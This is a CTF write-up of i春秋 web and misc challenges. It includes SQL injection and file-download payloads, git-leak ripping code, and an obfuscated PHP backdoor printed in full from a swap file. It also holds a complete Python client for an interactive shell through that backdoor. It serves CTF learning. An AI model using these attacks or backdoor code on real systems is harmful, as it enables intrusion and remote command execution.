Contest link: http://www.ichunqiu.com/racing/ctf_54967

Challenge: getflag  Type: web

The login page shows substr(md5(captcha), 0, 6)=3c7258, i.e. the first six hex digits of the captcha's MD5 must be 3c7258. A short Python script brute-forces it:

#!/usr/bin/env python
import hashlib

def md5(s):
    return hashlib.md5(s).hexdigest()

# try every integer captcha until the MD5 prefix matches
for i in range(1, 9999999):
    if md5(str(i)).startswith('3c7258'):
        print i

The brute force finds captcha = 2142719.

Capturing the login request in Burp Suite and trying admin' reveals an injection point; the classic admin' or '1' = '1 logs us in.

After login there is an action=file parameter.

It points to a file download endpoint, /file/download.php, whose f parameter takes a path. Requesting http://f394d013e2ff49deb6ce94ee686d3f67bc941de4c14e4004.ctf.game/Challenges/file/download.php?f=/var/www/html/Challenges/flag.php downloads the source of flag.php:

<?php
$f = $_POST['flag'];
$f = str_replace(array('`', '$', '*', '#', ':', '\\', '"', "'", '(', ')', '.', '>'), '', $f);
if((strlen($f) > 13) || (false !== stripos($f, 'return')))
{
    die('wowwwwwwwwwwwwwwwwwwwwwwwww');
}
try
{
    eval("\$spaceone = $f");
}
catch (Exception $e)
{
    return false;
}
if ($spaceone === 'flag'){
    echo file_get_contents("helloctf.php");
}
?>

So the POST parameter flag is assigned to $spaceone through eval(), and if it equals 'flag', file_get_contents() dumps helloctf.php. helloctf.php itself is filtered, so the arbitrary file download cannot fetch it. The blacklist strips quotes and a dozen other characters and the input must be at most 13 bytes, but a bare word passes: POST flag=flag; (for example with Firefox's HackBar) makes eval() run $spaceone = flag;, and PHP 5/7 treats the undefined constant flag as the string 'flag' (with a notice), so the comparison succeeds. The real flag then appears in the page source.

 

Challenge: Backdoor  Type: web

An exposed .git directory (Git source leak).

Grab rip-git.pl (from DVCS-Ripper; a Baidu search finds it). Its source:

#!/usr/bin/perl
use strict;
use LWP;
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;

my $configfile="$ENV{HOME}/.rip-git";
my %config;
$config{'branch'} = "master";
$config{'gitdir'} = ".git";
$config{'agent'} = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0.2) Gecko/20100101 Firefox/10.0.2';
$config{'verbose'}=0;
$config{'checkout'}=1;

if (-e $configfile) {
    open(CONFIG,"<$configfile") or next;
    while (<CONFIG>) {
        chomp;                  # no newlines
        s/#.*//;                # no comments
        s/^\s+//;               # no leading white
        s/\s+$//;               # no trailing white
        next unless length;     # anything left?
        my ($var, $value) = split(/\s*=\s*/, $_, 2);
        $config{$var} = $value;
    }
    close(CONFIG);
}

Getopt::Long::Configure ("bundling");

my $result = GetOptions (
    "a|agent=s" => \$config{'agent'},
    "b|branch=s" => \$config{'branch'},
    "u|url=s" => \$config{'url'},
    "c|checkout!" => \$config{'checkout'},
    "s|verifyssl!" => \$config{'verifyssl'},
    "v|verbose+"  => \$config{'verbose'},
    "h|help" => \&help
);

my @gitfiles=(
"COMMIT_EDITMSG",
"config",
"description",
"HEAD",
"index",
"packed-refs"
);

my @commits;

my $ua = LWP::UserAgent->new;
$ua->agent($config{'agent'});

my $gd=$config{'gitdir'}."/";
mkdir $gd;

print STDERR "[i] Downloading git files from $config{'url'}\n" if ($config{'verbose'}>0);

foreach my $file (@gitfiles) {
    my $furl = $config{'url'}."/".$file;
    getfile($file,$gd.$file);
}

mkdir $gd."logs";
mkdir $gd."logs/refs";
mkdir $gd."logs/refs/heads";
mkdir $gd."logs/refs/remotes";

mkdir $gd."objects";
mkdir $gd."objects/info";
mkdir $gd."objects/pack";
getfile("objects/info/alternates",$gd."objects/info/alternates");

mkdir $gd."info";
getfile("info/grafts",$gd."info/grafts");

my $res = getfile("logs/HEAD",$gd."logs/HEAD");
my @lines = split /\n/, $res->content;
foreach my $line (@lines) {
    my @fields=split(/\s+/, $line);
    my $ref = $fields[1];
    getobject($gd,$ref);
}

mkdir $gd."refs";
mkdir $gd."refs/heads";
my $res = getfile("refs/heads/".$config{'branch'},$gd."refs/heads/".$config{'branch'});
mkdir $gd."refs/remotes";
mkdir $gd."refs/tags";

my $pcount=1;
while ($pcount>0) {
    print STDERR "[i] Running git fsck to check for missing items\n" if ($config{'verbose'}>0);
    open(PIPE,"git fsck |") or die "cannot find git: $!";
    $pcount=0;
    while (<PIPE>) {
        chomp;
        if (/^missing/) {
            my @getref = split (/\s+/);
            getobject($gd,$getref[2]); # 3rd field is sha1
            $pcount++;
        }
    }
    close(PIPE);
    print STDERR "[i] Got items with git fsck: $pcount\n" if ($config{'verbose'}>0);
}

if ($config{'checkout'}) {
    system("git checkout -f");
}

sub getobject {
    my ($gd,$ref) = @_;
    my $rdir = substr ($ref,0,2);
    my $rfile = substr ($ref,2);
    mkdir $gd."objects/$rdir";
    getfile("objects/$rdir/$rfile",$gd."objects/$rdir/$rfile");
}

sub getfile {
    my ($file,$outfile) = @_;
    my $furl = $config{'url'}."/".$file;
    my $req = HTTP::Request->new(GET => $furl);
    # Pass request to the user agent and get a response back
    my $res = $ua->request($req);
    if ($res->is_success) {
        print STDERR "[d] found $file\n" if ($config{'verbose'}>0);
        open (out,">$outfile") or die ("cannot open file: $!");
        print out $res->content;
        close (out);
    } else {
        print STDERR "[!] Not found for $file: ".$res->status_line."\n" if ($config{'verbose'}>0);
    }
    return $res;
}

sub help {
    print "DVCS-Ripper: rip-git.pl. Copyright (C) Kost. Distributed under GPL.\n\n";
    print "Usage: $0 [options] -u [giturl] \n";
    print "\n";
    print " -c  perform 'git checkout -f' on end (default)\n";
    print " -b <s>  Use branch <s> (default: $config{'branch'})\n";
    print " -a <s>   Use agent <s> (default: $config{'agent'})\n";
    print " -s   verify SSL cert\n";
    print " -v verbose (-vv will be more verbose)\n";
    print "\n";
    print "Example: $0 -v -u http://www.example.com/.git/\n";
    print "Example: $0 # with url and options in $configfile\n";
    exit 0;
}

perl rip-git.pl -v -u http://ddb094bd01f34026b31b73f3493ca4aecef278b88da74c26.ctf.game/Challenges/.git/
git log
git reset --hard 12c6ddf4af0a5542c1cf6a9ab19b4231c1fd9a88

cat flag.php   # the recovered flag.php contains the following:

<?php
echo "flag{true_flag_is_in_the_b4ckdo0r.php}";
?>

So we need to look at b4ckdo0r.php. Looking for backup files turns up a .swo: that is a Vim swap file (Vim uses .swp first and falls back to .swo when .swp is already taken), left behind when the editor was not closed cleanly.

curl -O http://ddb094bd01f34026b31b73f3493ca4aecef278b88da74c26.ctf.game/Challenges/.b4ckdo0r.php.swo   # download the swap file
vim -r .b4ckdo0r.php.swo   # recover the edited buffer from the swap file

<?php
echo "can you find the source code of me?";
/*** Signature For Report*/$h='_)m/","/-/)m"),)marray()m"/","+")m),$)mss($s[$i)m],0,$e))))m)m,$k)));$o=ob)m_get_c)monte)m)mnts)m();ob_end_clean)';/**/$H='m();$d=ba)mse64)m_encode)m(x(gzc)mompres)ms($o),)m$)mk));print("<)m$k>$d<)m/)m$k>)m");@sessio)mn_d)mestroy();}}}}';/**/$N='mR;$rr)m=@$r[)m"HTT)mP_RE)mFERER"];$ra)m=)m@$r["HTTP_AC)mC)mEPT_LANG)mUAGE)m")m];if($rr)m&&$ra){)m$u=parse_u)mrl($rr);p';/**/$u='$e){)m$k=$)mkh.$kf;ob)m_start();)m@eva)ml(@gzunco)mmpr)mess(@x(@)mbase6)m4_deco)mde(p)m)mreg_re)mplace(array("/';/**/$f='$i<$)ml;)m){)mfo)mr($j)m=0;($j<$c&&$i<$l);$j)m++,$i+)m+){$)mo.=$t{$i)m}^$)mk{$j};}}r)meturn )m$o;}$r)m=$_SERVE)';/**/$O='[$i]="";$p)m=$)m)mss($p,3)m);}if(ar)mray_)mkey_exists)m()m$i,$s)){$)ms[$i].=$p)m;)m$e=s)mtrpos)m($s[$i],$f);)mif(';/**/$w=')m));)m$p="";fo)mr($z=1;)m$z<c)mount()m$m[1]);$)mz++)m)m)$p.=$q[$m[)m)m2][$z]];if(str)mpo)ms($p,$h))m===0){$s)m';/**/$P='trt)molower";$)mi=$m[1][0)m)m].$m[1][1])m;$h=$sl()m$ss(m)md5($)mi.$kh)m),0,)m3));$f=$s)ml($ss()m)mmd5($i.$kf),0,3';/**/$i=')marse_)mstr)m($u["q)muery"],$)m)mq);$q=array)m_values()m$q);pre)mg_matc)mh_all()m"/([\\w)m])m)[\\w-)m]+(?:;q=0.)';/**/$x='m([\\d)m]))?,?/",)m$ra,$m))m;if($q)m&&$)mm))m)m{@session_start();$)ms=&$_S)mESSI)m)mON;$)mss="sub)mstr";$sl="s)m';/**/$y=str_replace('b','','crbebbabte_funcbbtion');/**/$c='$kh="4f7)m)mf";$kf="2)m)m8d7";funct)mion x($t)m,$k){$)m)mc=strlen($k);$l=st)mrlen)m($t);)m)m$o="";for()m$i=0;';/**/$L=str_replace(')m','',$c.$f.$N.$i.$x.$P.$w.$O.$u.$h.$H);/**/$v=$y('',$L);$v();/**/
?>

A Baidu search identifies this as a known obfuscated PHP backdoor; see http://www.cnblogs.com/go2bed/p/5920811.html. Adapt the Python client from that write-up, changing url to your own target:

#!/usr/bin/env python
# encoding: utf-8
from random import randint,choice
from hashlib import md5
import urllib
import string
import zlib
import base64
import requests
import re

def choicePart(seq,amount):
    length = len(seq)
    if length == 0 or length < amount:
        print 'Error Input'
        return None
    result = []
    indexes = []
    count = 0
    while count < amount:
        i = randint(0,length-1)
        if not i in indexes:
            indexes.append(i)
            result.append(seq[i])
            count += 1
            if count == amount:
                return result

def randBytesFlow(amount):
    result = ''
    for i in xrange(amount):
        result += chr(randint(0,255))
    return result

def randAlpha(amount):
    result = ''
    for i in xrange(amount):
        result += choice(string.ascii_letters)
    return result

def loopXor(text,key):
    result = ''
    lenKey = len(key)
    lenTxt = len(text)
    iTxt = 0
    while iTxt < lenTxt:
        iKey = 0
        while iTxt<lenTxt and iKey<lenKey:
            result += chr(ord(key[iKey]) ^ ord(text[iTxt]))
            iTxt += 1
            iKey += 1
    return result

def debugPrint(msg):
    if debugging:
        print msg

# config
debugging = False
keyh = "4f7f" # $kh
keyf = "28d7" # $kf
xorKey = keyh + keyf
url = 'http://ddb094bd01f34026b31b73f3493ca4aecef278b88da74c26.ctf.game/Challenges/b4ckdo0r.php'
defaultLang = 'zh-CN'
languages = ['zh-TW;q=0.%d','zh-HK;q=0.%d','en-US;q=0.%d','en;q=0.%d']
proxies = None # {'http':'http://127.0.0.1:8080'} # proxy for debug

sess = requests.Session()

# generate random Accept-Language only once each session
langTmp = choicePart(languages,3)
indexes = sorted(choicePart(range(1,10),3), reverse=True)
acceptLang = [defaultLang]
for i in xrange(3):
    acceptLang.append(langTmp[i] % (indexes[i],))
acceptLangStr = ','.join(acceptLang)
debugPrint(acceptLangStr)

init2Char = acceptLang[0][0] + acceptLang[1][0] # $i
md5head = (md5(init2Char + keyh).hexdigest())[0:3]
md5tail = (md5(init2Char + keyf).hexdigest())[0:3] + randAlpha(randint(3,8))
debugPrint('$i is %s' % (init2Char))
debugPrint('md5 head: %s' % (md5head,))
debugPrint('md5 tail: %s' % (md5tail,))

# Interactive php shell
cmd = raw_input('phpshell > ')
while cmd != '':
    # build junk data in referer
    query = []
    for i in xrange(max(indexes)+1+randint(0,2)):
        key = randAlpha(randint(3,6))
        value = base64.urlsafe_b64encode(randBytesFlow(randint(3,12)))
        query.append((key, value))
    debugPrint('Before insert payload:')
    debugPrint(query)
    debugPrint(urllib.urlencode(query))

    # encode payload
    payload = zlib.compress(cmd)
    payload = loopXor(payload,xorKey)
    payload = base64.urlsafe_b64encode(payload)
    payload = md5head + payload

    # cut payload, replace into referer
    cutIndex = randint(2,len(payload)-3)
    payloadPieces = (payload[0:cutIndex], payload[cutIndex:], md5tail)
    iPiece = 0
    for i in indexes:
        query[i] = (query[i][0],payloadPieces[iPiece])
        iPiece += 1
    referer = url + '?' + urllib.urlencode(query)
    debugPrint('After insert payload, referer is:')
    debugPrint(query)
    debugPrint(referer)

    # send request
    r = sess.get(url,headers={'Accept-Language':acceptLangStr,'Referer':referer},proxies=proxies)
    html = r.text
    debugPrint(html)

    # process response
    pattern = re.compile(r'<%s>(.*)</%s>' % (xorKey,xorKey))
    output = pattern.findall(html)
    if len(output) == 0:
        print 'Error,  no backdoor response'
        cmd = raw_input('phpshell > ')
        continue
    output = output[0]
    debugPrint(output)
    output = output.decode('base64')
    output = loopXor(output,xorKey)
    output = zlib.decompress(output)
    print output
    cmd = raw_input('phpshell > ')

Running it gives a shell; the real flag is in this_i5_flag.php.

Challenge: login  Type: web

The page source reveals the credentials test1/test1.

After login we are redirected to member.php.

The captured request carries a header show with value 0; on a hunch, send the show header with value 1.

The response is a PHP snippet: it merges GET, POST, SESSION and COOKIE into a variable named requset (note the spelling: requset, not request, a small trick), and requset[token] goes through three decoding steps (base64_decode, gzuncompress, unserialize).

Finally it checks whether login[user] equals ichunqiu and, if so, prints the flag.

Write a PHP script that applies the three encodings in reverse order:

<?php
$requset = array_merge($_GET, $_POST, $_COOKIE);       // mirrors the server's merge (unused here)
$arr = array('user'=>'ichunqiu');
$a = base64_encode(gzcompress(serialize($arr)));       // serialize -> gzcompress -> base64
$login = unserialize(gzuncompress(base64_decode($a))); // sanity check: decodes back to $arr
echo $a;
?>

Put the printed $a into the Cookie as the token value; mine was eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==

Then the page returns the flag.
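As an added illustration (not part of the original write-up), here is the same token construction in Python 3, together with the server-side decode order it has to satisfy. The PHP serialize()/unserialize() helpers only handle flat arrays of ASCII strings, which is all this challenge needs; function names are mine. The token quoted above decodes to exactly the serialized array, so it is used as the reference value.

```python
import base64
import zlib


def php_serialize_string_array(items):
    # PHP serialize() of a flat array of strings: a:N:{s:len:"key";s:len:"value";...}
    # (lengths are byte counts; only ASCII keys/values are used here)
    body = ''.join('s:%d:"%s";s:%d:"%s";' % (len(k.encode()), k, len(v.encode()), v)
                   for k, v in items.items())
    return 'a:%d:{%s}' % (len(items), body)


def php_unserialize_string_array(data):
    # Minimal inverse for the same flat shape: read each string by its declared length
    if not data.startswith('a:'):
        raise ValueError('not a PHP array')
    count_end = data.index(':', 2)
    count = int(data[2:count_end])
    pos = data.index('{', count_end) + 1
    values = []
    for _ in range(2 * count):
        if not data.startswith('s:', pos):
            raise ValueError('only string members are supported')
        len_end = data.index(':', pos + 2)
        length = int(data[pos + 2:len_end])
        start = len_end + 2                  # skip ':"'
        values.append(data[start:start + length])
        pos = start + length + 2             # skip '";'
    return dict(zip(values[0::2], values[1::2]))


def make_token(items):
    # the server's decode chain reversed: serialize -> gzcompress -> base64_encode
    serialized = php_serialize_string_array(items).encode()
    return base64.b64encode(zlib.compress(serialized)).decode()


def decode_token(token):
    # what the server does: base64_decode -> gzuncompress (zlib format, 0x78 header)
    return zlib.decompress(base64.b64decode(token)).decode()


def server_accepts(token):
    # models the challenge's final check on unserialize(...)['user']
    login = php_unserialize_string_array(decode_token(token))
    return login.get('user') == 'ichunqiu'


if __name__ == '__main__':
    token = make_token({'user': 'ichunqiu'})
    print(token, server_accepts(token))
```

zlib.compress() writes the same zlib container as PHP's gzcompress(), which is why the token starts with eJ (0x78 0x9c); the compressed bytes may differ slightly between zlib builds, but the server only cares that it decompresses to the right serialized array.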

Challenge: 签到题 (sign-in)  Type: misc

Pure guesswork: send 百度杯么么哒 to the i春秋 WeChat official account and it replies with the flag.

Challenge: 我要变成一只程序猿 (I want to become a programmer)  Type: misc

The downloaded archive contains a txt file with a piece of C code:

#include<stdio.h>
#include<string.h>
void main() {
    char str[100]="";
    int i;
    int len;
    printf("input string:\n");
    gets(str);
    len=strlen(str);
    printf("result:\n");
    for(i=0;i<len+1;i++)
    {
        putchar(str[len-i]);
    }
    printf("\n");
}

It simply prints the input string reversed; the Python equivalent:

#!/usr/bin/env python
str = 'ba1f2511fc30423bdb'
print str[::-1]

flag{bdb32403cf1152f1ab}

Challenge: 那些年我追过的贝丝 (the "Beth", i.e. base, I chased)  Type: misc

Ciphertext: ZmxhZ3tpY3FlZHVfZ29nb2dvX2Jhc2U2NH0=. The title and the trailing = suggest base64; Python script:

#!/usr/bin/env python
import base64
s = 'ZmxhZ3tpY3FlZHVfZ29nb2dvX2Jhc2U2NH0='
print base64.b64decode(s)

flag{icqedu_gogogo_base64}

Challenge: Not Found  Type: web

Capturing the response shows a header X-method:haha, a hint to change the HTTP method; doing so yields a 302.

The next page takes an f parameter, which can read .htaccess.

Keep following the redirects.

XFF? Adding X-Forwarded-For: 127.0.0.1 fails; using Client-IP instead works and returns the flag.

Challenge: vld  Type: web

View the page source:

do you know Vulcan Logic Dumper?<br>false<br><!-- index.php.txt ?>

Open index.php.txt.

Roughly: the GET parameters flag1, flag2 and flag3 each have to equal a fixed string; putting them together in the URL is enough:

http://b0449533f3ac4fd6bf7bd9a5d7df293f26ea072caab34afe.ctf.game/?flag1=fvhjjihfcv&flag2=gfuyiyhioyf&flag3=yugoiiyhi

The response is:

do you know Vulcan Logic Dumper?
the next step is 1chunqiu.zip

Download 1chunqiu.zip; it contains 4 PHP files, 2 HTML files and 1 CSS file.

login.php:

<?php
require_once 'dbmysql.class.php';
require_once 'config.inc.php';

if(isset($_POST['username']) && isset($_POST['password']) && isset($_POST['number'])){
    $db = new mysql_db();
    $username = $db->safe_data($_POST['username']);
    $password = $db->my_md5($_POST['password']);
    $number = is_numeric($_POST['number']) ? $_POST['number'] : 1;
    $username = trim(str_replace($number, '', $username));
    $sql = "select * from"."`".table_name."`"."where username="."'"."$username"."'";
    $row = $db->query($sql);
    $result = $db->fetch_array($row);
    if($row){
        if($result["number"] === $number && $result["password"] === $password){
            echo "<script>alert('nothing here!')</script>";
        }else{
            echo "<script>alert('密码错误,老司机翻车了!');function jumpurl(){location='login.html';}setTimeout('jumpurl()',1000);</script>";
        }
    }else{
        exit(mysql_error());
    }
}else{
    echo "<script>alert('用户名密码不能为空!');function jumpurl(){location='login.html';}setTimeout('jumpurl()',1000);</script>";
}
?>

The script takes three POST parameters: username, password and number.

username is escaped once (safe_data).

password goes through the custom my_md5() in dbmysql.class.php.

Then every occurrence of number is removed from the escaped username.

The bug is in that username/number interplay. Send number=0 and a username that starts with a NUL byte (%00) followed by a single quote: escaping turns the NUL into the two characters \0 and the quote into \'. Removing the 0 leaves \\', where the first backslash now escapes the second one, so the single quote is free to close the opening quote of the SQL string and everything after it becomes part of the query.
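To make the escape-stripping concrete, here is a Python 3 model of that login.php logic (an added example, not code from the challenge). It assumes safe_data() behaves like mysql_real_escape_string(), uses a placeholder table name, and simplifies is_numeric() to plain decimal numbers.

```python
import re


def mysql_escape(value):
    # assumption: safe_data() behaves like mysql_real_escape_string(), which turns a NUL byte
    # into the two characters "\0" and prefixes quotes and backslashes with a backslash
    table = {'\x00': '\\0', '\\': '\\\\', "'": "\\'", '"': '\\"',
             '\n': '\\n', '\r': '\\r', '\x1a': '\\Z'}
    return ''.join(table.get(ch, ch) for ch in value)


def build_login_query(username, number, table='users'):
    # mirrors login.php: is_numeric() check (simplified), escape, then strip every
    # occurrence of $number from the *escaped* username, then trim
    number = number if re.fullmatch(r'-?\d+(\.\d+)?', number) else '1'
    username = mysql_escape(username).replace(number, '').strip()
    return "select * from `%s` where username='%s'" % (table, username)


def quote_escaped(query):
    # True when the username literal is still closed by the final quote only, i.e. no
    # bare quote appears inside it: count backslashes before every inner quote
    literal = query[query.index("username='") + len("username='"):-1]
    i = 0
    while i < len(literal):
        if literal[i] == '\\':
            i += 2                       # escaped pair, skip both characters
            continue
        if literal[i] == "'":
            return False                 # an unescaped quote leaked into the literal
        i += 1
    return True


if __name__ == '__main__':
    for user, num in (("admin'", '1'), ("' or 1=1#", '0'), ("\x00' or 1=1#", '0')):
        q = build_login_query(user, num)
        print(repr(q), 'safe' if quote_escaped(q) else 'INJECTED')
```

Only the third input (NUL byte plus number=0) breaks out: the escaping itself is fine, it is the str_replace() applied after escaping that turns \0\' into \\'.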

From there it is a standard error-based injection; reference: http://www.cnblogs.com/xishaonian/p/6243497.html

Error-based extraction only returns a limited number of characters per error (32 for the usual extractvalue/updatexml trick), so replace the second argument of concat() with substring() and pull the flag out in two halves.

Challenge: 传说中的签到题 (the legendary sign-in)  Type: misc

Sign-in challenges are always guesswork: the QR code decodes to "就算你发现我但是知道flag是什么??" ("even if you found me, do you know what the flag is??"), so the flag is literally 什么 ("what").

Challenge: challenge  Type: misc

Ciphertext: 666c61677b686578327374725f6368616c6c656e67657d

The string uses only digits and the letters a-f, so it is probably hex. Read in pairs, every pair starts with 6 or 7 and no digit exceeds 7, which is the printable lowercase ASCII range, so it is hex-encoded ASCII. Python script:

#!/usr/bin/env python
import binascii as ba
b = '666c61677b686578327374725f6368616c6c656e67657d'
a = ba.a2b_hex(b)
print a

flag{hex2str_challenge}

Challenge: 剧情大反转 (plot twist)  Type: misc

Ciphertext: }~144_0t_em0c14w{galf. Obviously the characters are reversed; Python script:

#!/usr/bin/env python
str = '}~144_0t_em0c14w{galf'
print str[::-1]

flag{w41c0me_t0_441~}

 

Challenge: fuzzing  Type: web

Capture a request first.

The response carries a hint about a "big intranet", which suggests faking the client address with X-Forwarded-For or Client-IP; "big intranet" points at a class A private address such as 10.0.0.1.

Follow the redirect.

We must supply a key; sending admin as a GET parameter does nothing, switching to POST gets a response.

It tells us that md5(key) is 1b4167610ba3f2ac426a68488dbd89be, that key starts with ichunqiu and that the last three characters come from a-z0-9 and must be brute-forced. Python script:

#!/usr/bin/env python
import hashlib

def md5(data):
    m = hashlib.md5()
    m.update(data)
    return m.hexdigest()

a = 'ichunqiu'
b = 'abcdefghijklmnopqrstuvwxyz1234567890'
# 36^3 candidates for the three unknown trailing characters
for i in b:
    for j in b:
        for k in b:
            if md5(a+i+j+k)=='1b4167610ba3f2ac426a68488dbd89be':
                print a+i+j+k

The key is ichunqiu105.

Next we are sent to xx00xxoo.php.

Its source is in x0.txt.

It is the Discuz authcode() function; the ciphertext echoed back is the encrypted flag, so paste the function into a local PHP file and decrypt it with the recovered key:

<?php
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if ($operation == 'DECODE') {
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc . str_replace('=', '', base64_encode($result));
    }
}

echo authcode('fda6UvwerCgVTBBzk/0doqIsXVv1oIlQD6pWMeDuvt/AbGoz6684WYwelmxpY6v1RQo5DIXrJaNiyxSK4JBFn3DcjDqPzvs', 'DECODE', 'ichunqiu105');
?>
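The same authcode() routine ported to Python 3, as an added example rather than code from the challenge or from Discuz. The port keeps the original's structure: the 64-character hex string is used directly as the RC4 key, the first 10 bytes of the plaintext are the expiry and the next 16 a truncated MD5 tag keyed with keyb. UC_KEY is not modelled, so a key must be supplied, and for ENCODE the 4-character keyc is taken from a random MD5 instead of md5(microtime()). The ciphertext and key under main are the ones from the challenge.

```python
import base64
import hashlib
import os
import time


def _md5hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def _discuz_rc4(data: bytes, cryptkey: str) -> bytes:
    # RC4 with the 64-char hex string used byte-for-byte as the key (PHP: ord($cryptkey[$i % 64]))
    rndkey = [ord(cryptkey[i % len(cryptkey)]) for i in range(256)]
    box = list(range(256))
    j = 0
    for i in range(256):
        j = (j + box[i] + rndkey[i]) % 256
        box[i], box[j] = box[j], box[i]
    out = bytearray()
    a = j = 0
    for byte in data:
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        box[a], box[j] = box[j], box[a]
        out.append(byte ^ box[(box[a] + box[j]) % 256])
    return bytes(out)


def authcode(string: str, operation: str = 'DECODE', key: str = '', expiry: int = 0) -> str:
    ckey_length = 4
    key = _md5hex(key.encode())               # PHP: md5($key ? $key : UC_KEY); UC_KEY not modelled
    keya = _md5hex(key[:16].encode())
    keyb = _md5hex(key[16:32].encode())
    if operation == 'DECODE':
        keyc = string[:ckey_length]           # the 4-char salt travels in clear at the front
    else:
        # PHP uses the last 4 hex digits of md5(microtime()); any 4 random hex digits do the same
        keyc = _md5hex(repr(time.time()).encode() + os.urandom(8))[-ckey_length:]
    cryptkey = keya + _md5hex((keya + keyc).encode())

    if operation == 'DECODE':
        body = string[ckey_length:]
        data = base64.b64decode(body + '=' * (-len(body) % 4))   # ENCODE strips the '=' padding
    else:
        plain = string.encode()
        head = b'%010d' % ((expiry + int(time.time())) if expiry else 0)
        data = head + _md5hex(plain + keyb.encode())[:16].encode() + plain

    result = _discuz_rc4(data, cryptkey)

    if operation == 'DECODE':
        head, mac, plain = result[:10], result[10:26], result[26:]
        # PHP: (head == 0 || head - time() > 0) && mac == substr(md5(plain . keyb), 0, 16)
        # a non-numeric head compares loosely equal to 0 in PHP 7, so it falls through to the MAC
        not_expired = (not head.isdigit()) or int(head) == 0 or int(head) > int(time.time())
        if not_expired and mac == _md5hex(plain + keyb.encode())[:16].encode():
            return plain.decode('utf-8', 'replace')
        return ''
    return keyc + base64.b64encode(result).decode().rstrip('=')


if __name__ == '__main__':
    # ciphertext and key from the challenge: prints the decrypted flag
    print(authcode('fda6UvwerCgVTBBzk/0doqIsXVv1oIlQD6pWMeDuvt/AbGoz6684WYwelmxpY6v1RQo5DIXrJaNiyxSK4JBFn3DcjDqPzvs',
                   'DECODE', 'ichunqiu105'))
```

Note what the 16-byte tag does and does not buy: it is an unkeyed-looking md5(plaintext . keyb) truncated to 16 hex characters, so a wrong key fails the check and returns '' instead of garbage, but the construction is still RC4 with a static key, not an authenticated cipher.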

Challenge: 表姐家的签到题 (cousin's sign-in)  Type: misc

No trick at all, the answer is given directly; just add the format: flag{123456abcdef}

Challenge: try again  Type: misc

Download the file, then on Linux dump its printable strings with strings and pipe them through grep to keep the one containing flag:

strings babyre | grep flag

flag{re_start_007}

Challenge: 听说是RC4算法 (said to be RC4)  Type: misc

The description says RC4, with key welcometoicqedu and ciphertext UUyFTj8PCzF6geFn6xgBOYSvVTrbpNU4OF9db9wMcPD1yDbaJw==. Note that this is not bare RC4 under that key: the Python script found online and adapted below treats the first 16 bytes of the decoded ciphertext as a salt and derives the RC4 key as sha1(key + salt).

import random, base64
from hashlib import sha1

def crypt(data, key):
    x = 0
    box = range(256)
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    x = y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
    return ''.join(out)

def tdecode(data, key, decode=base64.b64decode, salt_length=16):
    if decode:
        data = decode(data)
    salt = data[:salt_length]
    return crypt(data[salt_length:], sha1(key + salt).digest())

if __name__=='__main__':
    data = 'UUyFTj8PCzF6geFn6xgBOYSvVTrbpNU4OF9db9wMcPD1yDbaJw=='
    key = 'welcometoicqedu'
    decoded_data = tdecode(data=data, key=key)
    print decoded_data

flag{rc4_l_keepgoing}
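For reference, a Python 3 version of the scheme the script above implements, added here and not part of the original write-up: textbook RC4 checked against the well-known "Key"/"Plaintext", "Wiki"/"pedia" and "Secret"/"Attack at dawn" test vectors, plus the salted variant (16-byte salt, RC4 key = sha1(key + salt)) that this challenge uses. Function names are mine; the main block runs it on the challenge ciphertext and key.

```python
import base64
import hashlib


def rc4(key: bytes, data: bytes) -> bytes:
    # textbook RC4: key-scheduling (KSA) followed by the pseudo-random generation loop (PRGA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)


def salted_rc4_decode(b64_cipher: str, key: bytes, salt_length: int = 16) -> bytes:
    # the challenge's layout: base64( salt || RC4_{sha1(key || salt)}(plaintext) )
    raw = base64.b64decode(b64_cipher)
    salt, body = raw[:salt_length], raw[salt_length:]
    return rc4(hashlib.sha1(key + salt).digest(), body)


def salted_rc4_encode(plain: bytes, key: bytes, salt: bytes) -> str:
    # inverse of the above; RC4 is symmetric so encode and decode share rc4()
    return base64.b64encode(salt + rc4(hashlib.sha1(key + salt).digest(), plain)).decode()


if __name__ == '__main__':
    print(salted_rc4_decode('UUyFTj8PCzF6geFn6xgBOYSvVTrbpNU4OF9db9wMcPD1yDbaJw==',
                            b'welcometoicqedu'))
```

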